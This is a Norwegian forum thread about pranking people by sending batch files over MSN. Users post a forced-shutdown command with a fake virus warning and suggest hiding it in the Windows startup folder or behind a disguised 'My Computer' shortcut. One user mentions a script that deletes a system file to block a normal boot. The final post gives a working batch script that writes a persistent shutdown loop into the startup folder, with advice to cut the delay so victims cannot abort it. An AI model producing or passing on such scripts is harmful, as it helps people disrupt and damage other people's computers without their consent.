Gå til innhold

sende en bat fil over msn...

morgan_kane

Anbefalte innlegg

han fikk det ikke til :!:

Her er en kul en:

shutdown -s -t 10 -c "omg, your computerz got teh viruz!"

Kult. Jeg har alltid en Shutdown -A på skrivebordet jeg.

Jeg hadde en for å få ut cd romme før..

Hva med å legge inn shutdown -s -t 10 -c "omg, your computerz got teh viruz!" i oppstartsmappa til windows?

Eller enda bedre, legge den som Min Datamaskin på skrivebordet i tilleg :D, som snarvei, personen er dømt til og trykke på den en gang :!:

Lenke til kommentar
Videoannonse
Annonse

fikk en idè om ett virkelig slemt script.

Hvor slem vil du være mot han du tuller med?

det jeg tenkte på var å lage ett script som lager ett annet script, som legger seg i oppstarts-mappa og slår av maskinen etter f.eks 10 sec når han restarter den, hver gang han restarter den :)

Lenke til kommentar

det jeg tenkte på var å lage ett script som lager ett annet script, som legger seg i oppstarts-mappa og slår av maskinen etter f.eks 10 sec når han restarter den, hver gang han restarter den :)

Jeg har det på en CD, i tilleg til at sciptet fjerner en Systemfil som gjør at du ikke får boota vanlig windows, bare sikkermodus :p, også var det noe annet rart den gjorde.

Lenke til kommentar

Jeg har det på en CD, i tilleg til at sciptet fjerner en Systemfil som gjør at du ikke får boota vanlig windows, bare sikkermodus :p, også var det noe annet rart den gjorde.

Den er slem!

Lenke til kommentar

Den er slem!

Neida, er så koselig atte :)

NB: Brukes kun på folk som har fucka med PC-en min, som skjer rimelig ofte :p

Lenke til kommentar

en sånn en? :p

@echo off
FOR /F "tokens=3* delims=  " %%A in ('REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"') do SET startup=%%B
set av="%startup%\system.bat""
echo shutdown -s -t 10 -c "Hehe..." -f >> %av%

10 sek er forresten nok til å trykke windowstast+r shutdown -a

er bedre å gjøre det til 2 sek :innocent:

slette systemfiler er bare slemt. den her er ikke så vanskelig å kvitte seg med hvis man har litt peiling.

Endret av hernil
Lenke til kommentar

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!

Start en konto

Logg inn

Har du allerede en konto? Logg inn her.

Logg inn nå
  • Opprett ny...